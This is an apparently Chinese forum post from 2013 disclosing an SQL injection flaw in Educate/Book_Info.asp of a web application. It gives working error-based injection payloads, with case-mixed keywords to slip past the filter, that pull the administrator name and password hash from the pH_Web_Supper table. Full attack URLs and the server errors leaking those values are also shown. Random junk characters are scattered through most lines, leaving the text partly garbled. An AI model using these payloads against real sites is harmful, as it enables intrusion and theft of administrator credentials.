漏洞出现在Educate/Book_Info.asp 5 ?% l {! N L* s4 r: c1 T0 j
7 Q( {7 ?/ e1 p. \+ @
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出2 i( d! m+ n9 I( ?2 j
# Q4 }) t R4 @ [
exp:如下" L- I3 V1 A8 v8 D3 `
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)8 f `: o/ m" X2 g* f
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)0 H$ A+ t) @5 f1 A8 o% l* h) S+ A
6 b; b/ [' H* U; d
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)+ f8 F- h7 i0 C7 w1 l% a# X
& m- J; ~; n1 |0 a
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'2 }' ]2 t1 b2 D5 a' h+ l0 a
' ~+ ~' X3 L# f% E- N8 `$ k3 n( Q5 _
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。2 `5 D3 h7 @8 g
; l$ [# \& y' j2 f8 `/Educate/Book_Info.asp,行 8
/ N( n p; R$ R, ], u. z- @1 F 4 j1 M6 A3 Y4 B' u& B
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)0 p4 ]* N7 H2 b- F
5 U! q \8 ~. I; k5 J
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
+ C! J% q, Z J' a. N* p9 O5 f; ^
5 M/ G% l; L3 f! U将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
7 O$ @, ^& a1 d" i' | % }! ~7 S4 P" A! w0 W
/Educate/Book_Info.asp,行 8
- R% b; W# p9 p, M |
发表于 2013-2-16 21:44:16
收藏
支持
反对